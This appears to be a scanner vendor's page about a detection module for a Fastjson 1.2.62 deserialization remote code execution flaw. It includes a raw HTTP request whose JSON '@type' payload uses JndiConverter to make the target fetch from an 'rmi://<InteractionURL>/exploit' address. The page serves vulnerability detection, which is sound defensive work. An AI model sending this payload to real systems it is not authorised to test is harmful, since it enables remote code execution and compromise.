Ethical Hacking Automation

Automate Recon and scanning process with Vidoc. All security teams in one place

Fastjson 1.2.62 - Remote Code Execution

By kannthu

Critical
Vidoc logoVidoc Module
#fastjson#rce#deserialization#oast
Description

What is "Fastjson 1.2.62 - Remote Code Execution?"

The "Fastjson 1.2.62 - Remote Code Execution" module is designed to detect a vulnerability in the Fastjson 1.2.62 software. Fastjson is a Java library for parsing and generating JSON data. This module specifically targets a deserialization remote code execution vulnerability in Fastjson 1.2.62.

This vulnerability is classified as CWE-77 and has a severity level of critical. It allows an attacker to execute arbitrary code remotely, potentially leading to unauthorized access, data breaches, or system compromise.

This module was authored by zh.

Impact

The impact of the "Fastjson 1.2.62 - Remote Code Execution" vulnerability can be severe. By exploiting this vulnerability, an attacker can execute arbitrary code on the target system. This can lead to various consequences, including unauthorized access, data manipulation, and complete compromise of the affected system.

How the module works?

The "Fastjson 1.2.62 - Remote Code Execution" module works by sending a specific HTTP request to the target system. The request is designed to trigger the deserialization vulnerability in Fastjson 1.2.62. Upon successful exploitation, the attacker can execute arbitrary code on the target system.

Here is an example of the HTTP request used by the module:

POST / HTTP/1.1
Host: <Hostname>
Content-Type: application/json

{
   "@type":"org.apache.xbean.propertyeditor.JndiConverter",
   "AsText":"rmi://<InteractionURL>/exploit"
}

The module also includes matching conditions to determine if the vulnerability is present. In this case, it checks for the absence of the "dns" protocol in the response and a non-200 status code. If both conditions are met, the module reports the vulnerability.

It is important to note that this module is specifically designed for detecting the vulnerability and does not perform any remediation or mitigation actions.

For more information, you can refer to the GitHub repository related to this vulnerability.

Module preview

Concurrent Requests (1)
1. HTTP Request template
Raw request
Matching conditions
word: dnsand
NOT status: 200
Passive global matcher
No matching conditions.
On match action
Report vulnerability